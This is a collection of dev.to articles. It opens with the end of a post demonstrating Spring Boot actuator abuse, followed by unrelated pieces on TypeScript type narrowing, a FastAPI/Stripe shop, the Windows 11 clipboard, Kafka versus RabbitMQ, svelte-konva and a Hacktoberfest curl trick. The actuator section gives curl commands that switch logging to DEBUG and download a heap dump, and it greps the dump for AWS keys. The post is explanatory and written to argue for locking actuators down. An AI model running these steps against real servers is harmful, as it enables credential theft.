logger.debug("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
// Do some work with the AWS credentials
return "Hello World!";
}`
So you build, deploy, double-check that the logs are clean, and go to bed, knowing that your application is now safe - right?
## Changing Log Configuration
Enter /actuator/loggers. This endpoint gives us the log configuration for the application, and looks something like this:
`
$ curl localhost:8081/actuator/loggers | jq .
{
"levels": [
"OFF",
"ERROR",
"WARN",
"INFO",
"DEBUG",
"TRACE"
],
"loggers": {
// ...
"com.example.demo": {
"configuredLevel": null,
"effectiveLevel": "INFO"
},
"com.example.demo.DemoApplication": {
"configuredLevel": null,
"effectiveLevel": "INFO"
},
// ...
}
// ...
}`
So, we can see that the logger is configured to only log on the INFO level. Sure, this isn't great (the endpoint discloses a lot about the structure of the application, used dependencies, etc.), but it isn't immediately dangerous. What is dangerous is the fact that the logger configuration can also be changed from this actuator by sending a POST to the correct endpoint. In this case, I am setting the log level for the logger com.example.demo.demo application to DEBUG:
`$ curl -X POST localhost:8081/actuator/loggers/com.example.demo.DemoApplication -H 'Content-Type: application/json' -d '{"configuredLevel": "DEBUG"}'`
Visit the page again, retrieve the logs - and there we go:
`
$ curl localhost:8081/actuator/logfile
[...]
2022-09-24 13:57:37.774 INFO 71087 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-09-24 13:57:37.774 DEBUG 71087 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest`
The logs are back, clearly showing that the application is now logging on the DEBUG level. Now you are seriously annoyed, and decide to do what you should have done before: get rid of the logging statement, as there really is no good reason for it to be there in the first place anyway.
`@RequestMapping("/")
public String index() {
logger.info("Entering hello world function...");
String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
// Do not log the AWS Credentials, this is dangerous!
// => Commented out for now.
// logger.debug("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
// Do some work with the AWS credentials
return "Hello World!";
}`
Build, deploy, and finally we're safe. Right?
Actually, I'll Just Have Everything To Go, Please
Pulling data from logs is a really tedious task, and there is no guarantee for me (as an attacker) that the application will actually log interesting things. Sure, I could go ahead and set every single external library to the TRACE log level, collect the logs, and sift through them, but really, this seems like a lot of work I'd rather avoid doing, thank you very much. Why go to that trouble if I could instead just take... everything?
Well, lucky for me, there is /actuator/heapdump. This endpoint does exactly what it sounds like - it takes a copy of the Java heap (i.e., the memory of the application) and provides it to me as a large blob of binary data. Let's grab a copy and dig in.
`$ curl localhost:8081/actuator/heapdump -o heap.bin
`
Now, since you have cleverly disabled the logging of AWS credentials, I can no longer just read them from the logs - but they are still in the heap of the application! Likely in the middle of a big chunk of meaningless binary data, but that's what the strings utility is for - it pulls sequences of printable characters from any file and presents them to you, newline-separated. You can then just pipe the whole thing through grep to find what you are looking for. For example, AWS credentials.
`
# Use -C 20 to see 20 lines before and after each match
$ strings heap.bin | grep -C 20 AKIA
[...]
AWS_TOKEN#
AWS_TOKEN!
TESTingSecretAccessTest#
TESTingSecretAccessTest!
[...]
AWS_SECRET_KEY#
AWS_SECRET_KEY!
AKIATESTTEST#
AKIATESTTEST!`
And there we go - secrets, pulled directly from the brain of your application. In the same way, we could pull out cryptographic keys, API credentials, user data that the application is currently working on, internal API addresses, AWS resource identifiers, or whatever else the application is using. And at this point, there really isn't anything you can do about it.
Well, except, of course, not exposing your actuators.
## Closing Notes
I've only gone through a small number of the actuators in this blog post, and these aren't even necessarily [the most dangerous ones](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators). The only arguably harmless endpoint is the health check actuator (which is also the only one that is enabled by default). Any other endpoint should be considered dangerous (yes, even the Prometheus endpoint you are using for monitoring your application, unless you are fine with showing the whole world your resource usage and whatever business metrics you are exposing through it). The best thing you can do it to turn off every endpoint you are not actively using, limit access to the others using the firewall, and add authentication requirements.
In the next parts of this blog series, I will discuss how to detect your exposed endpoints. We will begin with detecting them in your code, and then move on to detecting them with dynamic security scanners. Finally, we will discuss how you can secure your actuators against attackers.
## Further reading:
- [The spring actuator documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html)
- [Introduction to Spring Boot Related Vulnerabilities](https://tutorialboy24.blogspot.com/2022/02/introduction-to-spring-boot-related.html)
- [Veracode listing options for RCE using Spring Actuators](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
- [A Study Notes of Exploit Spring Boot Actuator](https://tutorialboy24.blogspot.com/2022/02/a-study-notes-of-exploit-spring-boot.html)
| tutorialboy |
1,234,487 | Type-Safe TypeScript with Type Narrowing | 1. Introduction 2. Equality Narrowing 3. typeof 4. Truthiness Narrowing 5. instanceof 6.... | 0 | 2022-10-28T19:27:51 | https://www.rainerhahnekamp.com/en/type-safe-typescript-with-type-narrowing/ | typescript, javascript, webdev | - [1. Introduction](#1-introduction)
- [2. Equality Narrowing](#2-equality-narrowing)
- [3. `typeof`](#3-typeof)
- [4. Truthiness Narrowing](#4-truthiness-narrowing)
- [5. `instanceof`](#5-instanceof)
- [6. Discriminated Union](#6-discriminated-union)
- [7. `in` Type Guard](#7-in-type-guard)
- [8. Type Predicate](#8-type-predicate)
- [9. Type Narrowing against `unknown`](#9-type-narrowing-against-unknown)
- [9.1. Manual Validation](#91-manual-validation)
- [9.2. Automatic Validation: zod](#92-automatic-validation-zod)
- [10. Assertion Functions](#10-assertion-functions)
- [11. Summary](#11-summary)
This article shows common patterns to maximize TypeScript's potential for type-safe code. These techniques are all part of the same group, which we call type narrowing.
The source code can be found on: https://github.com/rainerhahnekamp/type-safe-typescript-with-type-narrowing
If you prefer a video over an article, then this is for you:
{% embed https://youtu.be/MUJBT3Pb_Eg %}
## 1. Introduction
Whenever we deal with a variable that can be of multiple types, like an `unknown` or a union type, we can apply type narrowing, to "narrow" it down to one specific type. We work together with the TypeScript compiler because it understands the context of our code and guarantees that this narrowing happens in a fully type-safe way.
Let's say we have a function with a parameter of type `Date | undefined`. Every time the function executes, the variable's type can either be `Date` or `undefined`, but not both types at the same time.
```typescript
function print(value: Date | undefined): void {}
```
If we apply an `if` condition, checking if that variable is not `undefined`, TypeScript understands its meaning and treats the value inside the condition only as a `string`. This is type narrowing.
```typescript
function print(input: Date | undefined): void {
if (input !== undefined) {
input.getTime(); // 👍 value is only Date
}
input.getTime(); // 💣 fails because value can be Date or undefined
}
```
There is also a very similar technique which is called type assertion. It looks like the easier option at first sight. In terms of type-safety though, it is not. We manually set the type and therefore overwrite the compiler.
If the compiler could speak to us, it would say something like: "OK, you know what you are doing there, but don't blame me if something goes wrong."
Therefore we should avoid type assertion and always favour type narrowing. (And in general: trying to be smarter than the compiler is never a good idea.)
```typescript
function print(input: Date | undefined): void {
(input as Date).getTime(); // type assertion - don't!
}
```
After this short introduction, let's come up with an example where we see the major type narrowing techniques in action.
This will be our "workbench":
```typescript
declare function diffInYears(input: Date): number;
declare function parse(input: string): Date;
function calcAge(input: Date | null | undefined): number {
return diffInYears(input); // will not work
}
```
`calcAge`, should return - as the name says - the age.
Additionally, we use the two utility functions `diffInYears` and `parse`. For simplicity, the snippet doesn't show their implementation.
The type of `input` in `calcAge` can be of three different types. The return statement will therefore fail to compile.
## 2. Equality Narrowing
An obvious start would be to check if `input` doesn't have the value `null` and `undefined`. If that's the case, then it can only be a `Date`.
If we add this condition, TypeScript understands it and treats `input` inside the `if`-block as `Date` and we can safely call `diffInYears`.
This "implicit understanding" of TypeScript is already our first type guard and it is called "Equality Narrowing".
```typescript
function calcAge(input: Date | null | undefined): number {
if (input !== null && input !== undefined) {
return diffInYears(input);
}
}
```
Please be aware, that the `if` condition is not a direct check for the type `undefined` or `null`. It runs against the value. In the same way, we would not be able to write a type check against a `Date`: `value === Date`. `Date` is the type of `input` and not its value.
So why can we use `undefined` and `null` then? The answer is quite obvious. The type `undefined` has just one value, which is 'undefined'. And the same is true for `null`. The type `null` can only have one value, and that is 'null'.
So what our condition really does, is that it is excluding all possible values that can come for `undefined` or `null`. For obvious reasons, we don't want want to exclude all possible values for type `Date` :)
## 3. `typeof`
Let's try another type guard. JavaScript provides `typeof` which we can place in front of any variable. As the name says, it will return the name of the variable's type as `string`… well not really. Otherwise we would have already reached the end of this article :).
In JavaScript, we have seven primitive types and the rest is just of type `object`. The primitive types are `boolean`, `string`, `number`, `undefined`, `null`, `bigint`, and `symbol`.
`typeof` returns the name of every primitive type, except for `null`. For `null` it returns 'object'. So one could assume that for `null` and any non-primitive type, we would get 'object'. But there is a second exception. `typeof` also returns 'function', if the variable is actually a `function` or if you pass the name of a `class`. Strictly speaking function is not a real type, it is a callable object.
With that knowledge, would the following code work?
```typescript
function calcAge(input: Date | null | undefined): number {
if (typeof input === "object") {
return diffInYears(input);
}
}
```
No. Since `typeof` returns for `null` also 'object' the compilation will fail. So for now, we don't have any use for the `typeof` type guard, but let's keep it in mind. We might need it later.
## 4. Truthiness Narrowing
JavaScript invented two new English terms. Falsy and Truthy. If we put a falsy value into a condition, it will return `false` and `true` for a truthy value. There is an exhaustive list of falsy values in JavaScript. They are `false`, `0`, `0n`, `''`, `null`, `NaN`, and `undefined`.
We could use that to our advantage. If we put only the `input` into the `if` condition, it would be `true` if the value is not `undefined` or `null`. In our case, this is very similar to the equalness operator but just shorter.
```typescript
function calcAge(input: Date | null | undefined): number {
if (input) {
return diffInYears(input);
}
}
```
We missed one tiny bit here. If the value is an empty string, it would also be false and we would not end up inside the `if`-condition. But that's OK for our use case, as long as we are aware of it.
Let's make our example more interesting. We add a fourth possible type which is a `string`. This is now the time where the `typeof` enters the game.
First, we get rid of the possibility that the value is `null` or `undefined` via truthiness narrowing and return the value 0 (we'll improve that later).
Then it is only between `Date` and `string`. And here we can use `typeof` to check if `input` is a `string`. If not, it can only be `Date`. Perfect!
```typescript
function calcAge(input: Date | null | undefined | string): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else {
return diffInYears(input);
}
}
```
## 5. `instanceof`
There is also a possibility for type narrowing when we deal with classes. For that purpose, let's add a class `Person`, which has a property `birthday` of type `Date`.
```typescript
class Person {
birthday = new Date();
}
function calcAge(input: Date | null | undefined | string | Person): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else {
return diffInYears(input); // failure: can be Date or Person
}
}
```
Obviously,the last return in the `else` clause will fail because `input` can be of type `Date` or `Person`. The good message is though, that both are actually class instances and we can use `instanceof`.
`instanceof` returns `true` if a value is an instance of a particular class. So if we add a condition with a check for class `Date`, we are on the type-safe side again:
```typescript
function calcAge(input: Date | null | undefined | string | Person): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else {
return diffInYears(input.birthday);
}
}
```
Be aware that `instanceof` returns `true` for the whole class inheritance chain. So if `Person` would extend from class `Entity`, `instanceof Entity` would also return true.
## 6. Discriminated Union
We use classes quite often, but more often we deal with object literals or - put in TypeScript jargon - interfaces or types.
Check out the slightly modified example:
```typescript
type Person = {
birthday: Date;
category: "person";
};
type Car = {
yearOfConstruction: Date;
category: "car";
};
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else {
return diffInYears(input.birthday); // Person | Car
}
}
```
Ouch, again a compilation error. Can't we just use `instanceof` here as well? No. `Person` and `Car` are both only a `type` which is an element that only exists in TypeScript. When it is transpiled to JavaScript the definition of `Person` and `Car` is not there anymore. Classes, on the other hand, do also exist in JavaScript. That's why `instanceof` works for them.
Okay, so what can we do?
We are in a kind of lucky position. Both `Person` and `Car` share the same property `category` and each has a distinct value. By verifying if `category` has the value "car", TypeScript is smart enough to understand that it can only be of type `Car`. For `Person` the value would be 'person' obviously. The name of this type guard is "discriminated union". Let's fix our code again:
```typescript
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (input.category === "Car") {
return diffInYears(input.yearOfConstruction);
} else {
return diffInYears(input.birthday);
}
}
```
We don't need to call the property for the discriminator `category`. We can pick whatever name we want.
## 7. `in` Type Guard
Consider the case where we are not so lucky to have a property that we can use as a discriminator value:
```typescript
type Person = {
birthday: Date;
};
type Car = {
yearOfConstruction: Date;
};
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (input.category === "Car") {
return diffInYears(input.yearOfConstruction);
} else {
return diffInYears(input.birthday);
}
}
```
In such a case, we can make use of the `in` type guard. With `in` we can request, if an object has a certain property or not. So if it is between `Person` and `Car`, and the property `birthday` is present, the type can only be `Person`.
```typescript
type Person = {
birthday: Date;
};
type Car = {
yearOfConstruction: Date;
};
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!value) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if ("birthday" in input) {
return diffInYears(input.birthday);
} else {
return diffInYears(input.yearOfConstruction);
}
}
```
## 8. Type Predicate
Our next type guard is not a real type guard in that sense, it is some kind of a compromise.
First, let's replace the type `Car` with a type `PersonJson`. It has also a property `birthday` but it is of type `string`.
We could get away with it by `typeof value.birthday === 'string'`. This a combination of the `typeof` and the discriminated union type guard:
```typescript
type Person = {
birthday: Date;
};
type PersonJson = {
birthday: string;
};
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (typeof input.birthday === "string") {
return diffInYears(parse(input.birthday));
} else {
return diffInYears(input.birthday);
}
}
```
This code compiles and everything looks alright, but it is not perfect. If we would assign `input` to a new variable inside the last `else if` statement, we would see that TypeScript identifies the type not as `PersonJson` but as `Person | PersonJson`.
This is the point in time, where we reached the limits of TypeScript. Fortunately, it doesn't mean game over.
Whenever TypeScript runs out of options, it gives us the possibility to come up with a function that contains validation code for a particular type.
In a way, this is a compromise. We can write whatever we want in that function, as long as we return `true` or `false`. TypeScript will trust us.
This special function is called "type predicate" and for `Person` it looks like that:
```typescript
function isPerson(value: Person | PersonJson): value is Person {
return value.birthday instanceof Date;
}
```
Please note the special notation where we normally have the return type.
We use the predicate as any other function and place it into the last `else if` condition:
```typescript
type Person = {
birthday: Date;
};
type PersonJson = {
birthday: string;
};
function isPerson(value: Person | PersonJson): value is Person {
return value.birthday instanceof Date;
}
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (isPerson(input)) {
return diffInYears(input.birthday);
} else {
return diffInYears(parse(input.birthday));
}
}
```
## 9. Type Narrowing against `unknown`
With type predicates, we could even deal with variables of type `unknown`. Everything it takes, is to apply an `if` condition with the type predicate and voilà, problem gone.
But we have to be careful and shouldn't trick ourselves. The type narrowing is only as good as our validation logic.
If we would have a value of type `unknown` and we would like to verify if that has the "shape" of `Person` we would have to come up with a better code than the one we used before. By "shape", we mean any object literal or instance which has a property of `birthday: Date`.
### 9.1. Manual Validation
A type-safe type predicate would look like this:
```typescript
function isPerson(value: unknown): value is Person {
return (
typeof value === "object" &&
value !== null &&
"birthday" in value &&
(value as { birthday: unknown }).birthday instanceof Date
);
}
```
What a huge amount of code! Unfortunately, it is necessary if we want to be full type-safe.
The function shows another limitation of TypeScript's capabilities. Although we checked that `birthday` is a property of `value`, we still have to apply type assertion in the last condition to check if `birthday` is of type `Date`.
We can expect that over time TypeScript's limitations become less but at the moment it is what it is.
### 9.2. Automatic Validation: zod
We stay with type narrowing against the `unknown` type. Depending on the application type, we might quite often have to deal with the `unknown` type. Clearly, we don't want to write these huge type predicates all the time on our own. It takes quite a lot of precious time away.
Fortunately, it doesn't have to be like that. There are special libraries that do the validation automatically.
One of the most popular ones is "zod".
For every type, we have to come up with a schema first. This means we programmatically define the type and store it into a variable. So the schema information is also present during the runtime.
The generated schema is then used inside of a type predicate to validate if a value is of that type or not.
With zod, our `isPerson` would look like that:
```typescript
const personSchema = z.object({
birthday: z.date(),
});
type Person = z.infer<typeof personSchema>;
function isPerson(value: unknown): value is Person {
return personSchema.safeParse(value).success;
}
```
First, we define the schema and store it under `personSchema`. With an existing schema, we can ask zod to generate the type automatically for us. This works with `z.infer`. This simplifies things and also makes sure that we don't have double work when we change the `Person` type.
Last, we use the method `safeParse` which doesn't throw an error, if the value is not of type `Person`. It returns the result via the `success` property.
This is way much better than writing validation code manually all the time.
## 10. Assertion Functions
The last feature which is not a type guard, but comes in very handy, is the assertion function.
We return the number 0 in the first condition, when the type is `unknown`, `null`, or an empty string.
Returning number 0 is one way how to do it. The alternative is to throw an error.
If we throw an error, TypeScript's type narrowing will exclude `undefined` or `null` from the rest of the function's code.
An assertion function is a special function which does exactly do that. If we call it, it will - similar to the type guard - narrow down the parameter but it doesn't return a boolean. It guarantees us that it throws an error, if the value is not of the specific type.
Dealing with types that should not be `undefined` or `null` is so common, that TypeScript even provides a special type utility. It goes under the name `NonNullable<T>`. This type utility means, whatever type `T` is, it is not `undefined` or `null`. Let's see how `NonNullable<T>` and the assertion function work in action:
```typescript
function assertNonNullable<T>(value: T): asserts value is NonNullable<T> {
if (value === undefined || value === null) {
throw new Error("undefined or null are not allowed");
}
}
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
assertNonNullable(input);
if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (isPerson(input)) {
return diffInYears(input.birthday);
} else {
return diffInYears(parse(input.birthday));
}
}
```
One final question must be allowed: When we throw an error, why don't we just remove them from the parameter's union type in the first place? Like `function calcAge(value: Date | string | Person | PersonJson): number {}`?
Well, because the caller might force us to include it. For example, in Angular, a form's input value is `undefined` when it is disabled. So we could of course say, that our program logic doesn't allow an `undefined` because we didn't provide a disable function. Nevertheless, the type of our form library has it and that's why it is among the parameter's types.
## 11. Summary
This article showed various techniques to deal with union types and how to narrow them down to one specific type. TypeScript is able to validate these patterns which means we are not trying to outsmart the compiler but produce code which is as much type-safe as possible.
We should always try to favour type narrowing over type assertion. It means more effort but we don't have to sacrifice type-safety.
Type-safety is actually the main reason, why we use TypeScript over JavaScript. We want to get as much type-safety as possible. From that perspective, the proper usage of type narrowing is the most important TypeScript skill for an application developer.
| rainerhahnekamp |
1,235,224 | Stripe, FastAPI, Bootstrap 5 - Free eCommerce | Simple eCommerce powered by FastAPI and Stripe that uses a modern Bootstrap 5 design - Open-source project. | 0 | 2022-10-29T09:24:09 | https://www.admin-dashboards.com/free-ecommerce-fastapi-stripe-bootstrap-5/ | stripe, fastapi, bootstrap5, ecommerce | ---
title: Stripe, FastAPI, Bootstrap 5 - Free eCommerce
published: true
description: Simple eCommerce powered by FastAPI and Stripe that uses a modern Bootstrap 5 design - Open-source project.
tags: stripe, fastapi, bootstrap5, ecommerce
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wg2tqct1k6txz60zu4vp.jpg
canonical_url: https://www.admin-dashboards.com/free-ecommerce-fastapi-stripe-bootstrap-5/
---
Hello Coders!
This article presents a simple **eCommerce** starter powered by [Stripe, FastAPI](https://github.com/app-generator/ecommerce-fastapi-stripe) (for the backend logic), and **Bootstrap 5** (for styling). `The goal of this starter is to help programmers bootstrap fast a decent and secure eCommerce solution with minimal effort`. Being **open-source** and released under the MIT license, the codebase can be easily extended, incorporated in commercial projects, or used in eLearning activities.
> *Thanks for reading!*
- 👉 [FastAPI & Stripe eCommerce](https://github.com/app-generator/ecommerce-fastapi-stripe) - source code
- 👉 Ask for [support](https://appseed.us/support/) (just in case)
A strong point of this project is the UI Kit provided by `Creative-Tim`, a well-known agency, that released the design for free. [Soft UI Design](https://www.creative-tim.com/product/soft-ui-design-system?AFFILIATE=128200), comes with 50+ components and reusable widgets for at least a decent eCommerce project.
{% embed https://www.youtube.com/watch?v=bMFuQPwrh8A %}
---
## ✨ Product Highlights
This mini eCommerce loads the products from JSON files saved in the templates directory and build dynamic pages based on this minimal information.
- ✅ Backend: **FastAPI**
- ✅ Payments: **Stripe**
- ✅ Design: [Soft UI Design](https://www.creative-tim.com/product/soft-ui-design-system?AFFILIATE=128200) (free version)
- ✅ Deployment: **Docker**
- ✅ Secure by default: No database is used
- ✅ MIT license
The minimal information required for a product definition can be found below:
```json
{
"name": "Air ZOOM Pegasus",
"price": 499,
"currency": "usd",
"short_description": "A workhorse built to help ..(truncated)..",
"full_description": "A workhorse built to help power ..(truncated).."
}
```
{% embed https://github.com/app-generator/ecommerce-fastapi-stripe %}
If your workstation has Docker installed, the product can be started via a single command typed in the terminal (make sure you're at the root of the sources).
```bash
$ docker-compose up --build
```
Once this command finishes the execution, the app should be up & running in the browser.

---
> `Thanks for reading!` For more resources and support, please access:
- 🚀 Free [support](https://appseed.us/support/) via Email & Discord
- 👉 Other [tools](https://appseed.us/developer-tools/) and [free apps](https://appseed.us/apps/open-source/) provided by AppSeed
| sm0ke |
1,235,443 | Cara Mengaktifkan Clipboard di Laptop Windows 11 | Ingin mengaktifkan clipboard di Windows 11 untuk mengakses item yang baru saja disalin? Dalam panduan... | 0 | 2022-10-29T15:11:21 | https://dev.to/rino/cara-mengaktifkan-clipboard-di-laptop-windows-11-368 | Ingin mengaktifkan clipboard di Windows 11 untuk mengakses item yang baru saja disalin? Dalam panduan ini, kami akan membagikan<a href="http://wh977764.ispot.cc/cara-menggunakan-clipboard-di-windows-11/"> cara menggunakan clipboard di laptop Windows 11</a>.
Saat kita menyalin sesuatu di komputer, itu secara otomatis ditransfer ke clipboard dan ditempelkan. kamu tidak hanya dapat menempelkan beberapa item dari riwayat clipboard dengan Windows 11, tetapi juga dapat menyematkan item yang sering digunakan dan menyinkronkan riwayat clipboard ke perangkat lain melalui cloud.
Riwayat clipboard di Windows dibatasi hingga 4MB dan hingga 25 entri yang disalin. Format berikut didukung: teks, HTML, dan Bitmap. Kecuali yang disematkan, riwayat clipboard segera dihapus saat me-reboot PC. Riwayat clipboard juga disinkronkan di semua perangkat yang terhubung dengan Microsoft.
Ketika Windows 11 diluncurkan ke masyarakat umum, ia akan memiliki banyak fitur dan peningkatan baru yang akan menarik bagi sebagian orang sambil menimbulkan masalah bagi orang lain. Orang harus mempelajari metode baru untuk berinteraksi dengan dan mengelola Windows 11 karena fitur dan pengaturan tertentu telah berubah secara signifikan.
<h2>Cara Mengaktifkan Clipboard Windows 11</h2>
Windows 11 akan mengingat gambar, teks, skrip, tautan, dokumen, dan film di bawah 4 MB saat mengaktifkan fitur riwayat clipboard. Windows 11, di sisi lain, hanya akan menyimpan maksimal 25 entri. Item yang disalin terakhir akan dihapus dari clipboard setelah mencapai batas nomor 25. Saat hal-hal baru tiba, item yang lebih lama akan dihapus dari riwayat clipboard.
Selain itu, kecuali item disematkan ke Clipboard, daftar riwayat Clipboard akan diatur ulang setiap kali komputer atau laptop dihidupkan ulang.
Jadi, untuk membuka atau melihat riwayat clipboard di Windows 11, kamu harus mengaktifkannya terlebih dahulu. Berikut langkah-langkah untuk mengaktifkannya.
<ol>
<li>Tekan tombol <strong>Windows + I</strong> sekaligus membuka <strong>Settings</strong> langsung.</li>
<li>Pilih <strong>System</strong> dari panel sisi kiri dan kemudian klik <strong>clipboard</strong>.</li>
<li>Di panel sisi kanan <strong>clipboard</strong>, nyalakan sakelar ke <strong>On</strong> posisi di sebelah riwayat Clipboard.</li>
</ol>
<h3>Cara Membuka Clipboard History di Windows 11</h3>
Setelah mengaktifkan riwayat Clipboard, tekan <strong>Windows + V</strong> nanti akan membawakan kamu daftar objek terbaru yang telah disalin. Akan ada jendela kecil yang akan terbuka. Di bagian atas daftar akan menjadi item yang paling baru disalin.
<h4>Menghapus item dari Clipboard History</h4>
<ul>
<li>Tekan tombol <strong>Windows + I</strong> bersamaan untuk membuka menu<strong> Settings</strong>.</li>
<li>Kemudian tap <strong>System</strong> dan klik <strong>clipboard</strong>.</li>
<li>Sekarang, klik tombol <strong>Hapus</strong> di sebelahnya <strong>Hapus data papan klip</strong> untuk menghapus semua riwayat clipboard.</li>
</ul>
Jika tidak ingin menggunakan aplikasi Pengaturan untuk menghapus riwayat Clipboard, kamu dapat menggunakan metode ini. Dengan tekan tombol pintasan <strong>Windows + V</strong>, jendela Clipboard akan muncul. Klik <strong>Clear all</strong> untuk menghapus semua entri dari riwayat Clipboard sekaligus.
Selanjutnya klik <strong>Titik 3</strong> pada item apa pun yang ingin dihapus untuk menghilangkannya dari clipboard. Tap ikon <strong>Delete</strong>.
Jika ingin menyimpan item tertentu dalam riwayat Clipboard untuk waktu yang lama, buka menu tiga titik dan pilih <strong>pin</strong>. Objek yang disematkan akan selalu ada di riwayat Clipboard, bahkan jika kamu me-reboot komputer atau menggunakan opsi Hapus semua.
<h4>Menonaktifkan Riwayat Clipboard</h4>
Untuk sepenuhnya menonaktifkan riwayat clipboard, buka <strong>Settings</strong> > <strong>System</strong> > <strong>clipboard</strong> dan nonaktifkan<strong> Clipboard History</strong>.
Demikianlah cara membuka atau mengakses clipboard history di Windows 11. Semoga bermafaat. | rino | |
1,235,476 | Kafka Vs RabbitMQ | Distribution Kafka consumers get distributed through topic partitions. Each consumer... | 20,235 | 2022-10-29T16:12:42 | https://dev.to/rakeshkr2/kafka-vs-rabbitmq-4ioj | kafka, rabbitmq, beginners, difference | ## Distribution
**Kafka** consumers get distributed through topic partitions. Each consumer consumes messages from a specific partition at a time.
There are a number of consumers present for each **RabbitMQ** queue instance. These consumers are known as Competitive consumers as they compete with one another for consuming the message. But, the message can be processed just once.
## High Availability
With the help of zookeeper, it manages the state of the **Kafka** cluster and supports high availability.
Through clustering and high available queues provides high-performance data replication. Thus, **RabbitMQ** also provides high availability.
## Performance
**Kafka** can process millions of messages in a second with less number of the hardware.
**RabbitMQ** can also process millions of messages within a second, but it needs more number of the hardware.
## Replication
There are replicated brokers available in **Kafka**, which works when the master broker is down.
Here, queues are not automatically replicated. The configuration is mandatory.
## Multi subscriber
Multiple consumer types can subscribe to many messages to **Kafka**.
In **RabbitMQ**, although messages are routed to various queues, only one consumer from a queue can process the message.
{% embed https://youtu.be/Y2R8s8-MMBg %}
## Message Protocols
**Apache Kafka** supports primitives such as int8, int16, etc. and binary messages.
**RabbitMQ** supports any standard queue protocols such as STOMP, AMQP, HTTP, etc.
## Message Ordering
In **Kafka** Message ordering is present inside the partition only. It guarantees that either all fail or pass together.
**RabbitMQ** maintains the order for flows via a single AMQP channel. In addition, it also reorders the retransmitted packets inside its queue logic that will prevent the consumer from resequencing the buffers.
## Message lifetime
**Kafka** contains a log file that prevents all messages anytime.
Since **RabbitMQ** is a queue, messages once consumed are removed, and the acknowledgment is received.
## Architecture
Highly scalable pub/sub distributed messaging system. It has brokers, topics, partitions, and topics within the **Kafka** cluster.
A general-purpose pub/sub message broker. Its architecture varies from Kafka as it consists of queues.
## Use Cases
**Kafka** is mainly used for streaming the data.
The web servers mainly use **RabbitMQ** for immediate response to the requests.
## Transactions
**Kafka** supports those transactions that exhibit a read-process-write pattern performed to/from Kafka topics.
**RabbitMQ** does not guarantee atomicity even when the transaction indulges only a single queue.
## Language
**Apache Kafka** is written in Scala with JVM.
**RabbitMQ** is written in Erlang.
## Routing Support
**Kafka** supports complex routing scenarios.
**RabbitMQ** does not support complex routing scenarios.
## Developer Experience
With high growth, **Kafka** led to a good experience. ~~But, it only supports Java clients.~~
**RabbitMQ** carries mature client libraries that support Java, PHP, Python, Ruby, and many more.
| rakeshkr2 |
1,235,625 | Initial konva-svelte public pre-release | React for Konva ? - Of cource !, Vue for Konva ? – Of cource, Finally, Svelte for Konva, here it go... | 15,873 | 2022-10-29T21:41:19 | https://dev.to/projektorius96/initial-konva-svelte-public-pre-release-3mfa | React for Konva ? - Of cource !, Vue for Konva ? – Of cource, Finally, Svelte for Konva, here it go :
[svelte-konva](https://github.com/projektorius96/svelte-konva/releases/tag/v1.0.0) | projektorius96 | |
1,236,500 | Easter eggs in Hacktoberfest 🪺 | Floating shark 🦈 🎈 Enter the following command in your terminal to see - ascii art of a... | 20,298 | 2022-10-31T00:30:20 | https://dev.to/batunpc/easter-eggs-in-hacktoberfest-11ei | tutorial, opensource, productivity, showdev |
## Floating shark 🦈 🎈
Enter the following command in your terminal to see - _[ascii art](https://www.asciiart.eu/)_ of a shark floating in the air with a balloon shaped like a heart `❤` and telling you **DO Love** in 3D letters!
```sh
curl -s https://hacktoberfest.com/profile/ | head -n40 | tail -n40 | tail -n39
```
> **Note**: Ensure that you have [curl](https://curl.se/) installed. Install it with `sudo apt install curl` or `brew install curl` if you are on macOS.
I had to pipe the curl request with a bunch of `head` and `tail` commands just to capture the `ASCII Art` of the shark.
### Even cooler 🌈
Pipe the above command with `lolcat` to see the shark in rainbow colors!
```sh
curl -s https://hacktoberfest.com/profile/ | head -n40 | tail -n40 | tail -n39 | lolcat
```
> **Note**: Ensure that you have [lolcat](https://github.com/jaseg/lolcat) - `brew install lolcat`
It will look something like this -

You could also simply view the shark by visiting [Hacktoberfest profile](https://hacktoberfest.com/profile/) and check the console from dev tools.
## Progress report
